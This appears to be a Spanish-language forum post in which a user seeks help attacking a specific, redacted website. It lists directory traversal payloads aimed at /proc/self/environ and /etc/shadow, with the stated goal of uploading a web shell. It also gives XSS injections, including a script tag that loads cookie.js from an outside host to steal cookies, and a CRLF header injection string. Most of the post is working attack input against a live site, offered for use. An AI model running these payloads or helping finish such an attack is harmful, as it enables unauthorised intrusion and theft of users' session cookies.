Puedes hacer cualquier tipo de LFI y variantes.
Por ejemplo mira si tiene proc/self/environ podrías llegar a subir una web shell.
1.-Nada, no muestra nada.
action=../../../../../../../../../../proc/self/environ%00.png
No muestra nada cuando action=../../../../../../../../../../etc/
shadow%00.png&id=4504
creo q solo es vuln pal passwd
asi k no me deja.
¿Hay algun otro metodo?
Si no se puede con directory traversal, la web es vulnerable tb a:
-ASP.NET Padding Oracle Vulnerability
-Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
Pero estas si q verdaderamente no se ni por donde empezar...
2.-EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad="
Yo ya he usado anteriormente en otra web xss usando este codigo:
http://xxxxx.com/?action=best&srt=1>"><script src="
http://xxxxx/cookie.js">&dir=1El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras:
Vuln: action=best&dir=" onmouseover=prompt(970448) bad="
srt=0
Modificado:
action=best&dir=" onmouseover=<script src="
http://xxxxx/cookie.js"> bad="
srt=0
action=best&dir=" onmouseover=alert() bad="
srt=0
action=best&dir=" onmouseover=<script>alert()</script> bad="
srt=0
ETC...
Pero nada funciona, solo el prompt.
3.-Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection:
/download.php?id=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&t=1287498936
El caso es que no me aparece nada, ¿debería?
Haber si algun alma caritativa se atreve
asias.